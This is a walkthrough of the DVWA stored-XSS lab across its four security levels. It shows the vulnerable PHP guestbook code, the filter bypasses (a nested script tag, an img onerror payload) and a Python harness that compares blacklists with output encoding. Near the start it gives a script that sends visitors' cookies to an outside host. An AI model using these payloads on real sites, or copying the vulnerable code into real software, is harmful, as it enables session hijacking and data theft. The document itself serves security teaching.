LOW
Stored XSS: the malicious code is saved on the target website's server, which makes this attack comparatively stable and persistent. Typical scenarios are blogs, forums, OA, CRM and other social sites. For example, a CRM system's customer complaint feature has a stored XSS vulnerability; a hacker submits malicious code, and when the system administrator views the complaint the code executes and steals customer data, while the administrator notices nothing. That is a typical stored XSS attack.
Clicking (submit) returns the query result.
If you enter <script>alert('xss')</script>
Take a look at the database:
So there is an injection vulnerability. The Hacker then enters <script src="http://www.a.com/test.js"></script>
// test.js: the attacker-hosted script loaded by the tag above; it sends the viewer's cookies to the attacker's host via an image request
var img = document.createElement("img");
img.src = "http://www.a.com/?cookies=" + escape(document.cookie);
document.body.appendChild(img);
After that, the cookies of every user who views this message are stolen. The low-level code looks like this; it has no protection at all.
Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
Related functions
stripslashes
addslashes() function
medium
Delete the JS statements stored in the database before attempting the next higher level.
Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
strip_tags() function
addslashes() function
mysql_real_escape_string function: escapes special characters such as ", ' and \r; htmlspecialchars: escapes HTML-related characters.
However, the name field only has the string <script> removed and is escaped with mysql_real_escape_string (which protects the SQL query, not the HTML output), so the name field can be used for injection.
Enter the following in the Name field. The front end limits the field's length; you can change maxlength directly in Firefox, or modify the request in Burp Suite. So this code can still be injected.
<scri<script>pt>alert('xss')</script>
Take a look at the database:
The high-level code changes the validation of name to the following regex, which only removes strings that spell out s-c-r-i-p-t after a '<'; the payload below contains no such sequence and passes through:
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
<img src=1 onerror=alert(/xss/)>
impossible
Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = stripslashes( $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$name = htmlspecialchars( $name );
// Update database
$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
$data->bindParam( ':message', $message, PDO::PARAM_STR );
$data->bindParam( ':name', $name, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
The anti-CSRF token mechanism defends against CSRF attacks.
Prepared statements via $db->prepare with bound parameters defend against SQL injection.
The name and message parameters are encoded with htmlspecialchars and related functions, so they are rendered as text rather than as markup.
Related functions
trim()
stripslashes
htmlspecialchars: escapes HTML-related characters
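As an added example (not code from DVWA or from this post), the Python harness below re-creates the Name-field filter of each level and runs the three payloads shown on this page through all of them, to make the difference between blacklist removal and output encoding concrete. It assumes that str.replace, re.sub and html.escape mirror PHP's str_replace, preg_replace and htmlspecialchars closely enough for these inputs.

```python
import html
import re

# Constructed sample inputs: the three Name-field payloads discussed above.
PAYLOADS = {
    "plain": "<script>alert('xss')</script>",
    "nested": "<scri<script>pt>alert('xss')</script>",
    "img_onerror": "<img src=1 onerror=alert(/xss/)>",
}


def low_name(name: str) -> str:
    """Low: no HTML filtering at all (the original only escapes for SQL)."""
    return name


def medium_name(name: str) -> str:
    """Medium: str_replace('<script>', '', $name). Python's str.replace is
    single-pass like PHP's, so the nested tag re-forms after removal."""
    return name.replace("<script>", "")


def high_name(name: str) -> str:
    """High: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name).
    Only strings that spell s-c-r-i-p-t after a '<' are touched."""
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.I)


def impossible_name(name: str) -> str:
    """Impossible: htmlspecialchars($name). html.escape(quote=True) is the
    closest standard-library equivalent (escapes & < > " ')."""
    return html.escape(name, quote=True)


# A filtered value is still dangerous if a raw '<' can open a tag; once '<' is
# encoded as '&lt;' the rest of the text (even 'onerror=') is inert.
TAG_OPEN = re.compile(r"<[a-z]", re.I)


def survives(filter_fn, payload: str) -> bool:
    """True when active markup is left after the filter runs."""
    return TAG_OPEN.search(filter_fn(payload)) is not None


def evaluate(filter_fn) -> dict:
    """Map each payload label to whether it survives the given filter."""
    return {label: survives(filter_fn, p) for label, p in PAYLOADS.items()}


if __name__ == "__main__":
    for fn in (low_name, medium_name, high_name, impossible_name):
        print(f"{fn.__name__:16s} {evaluate(fn)}")
```

Only the encoding filter neutralises every payload; each blacklist leaves at least one of them intact.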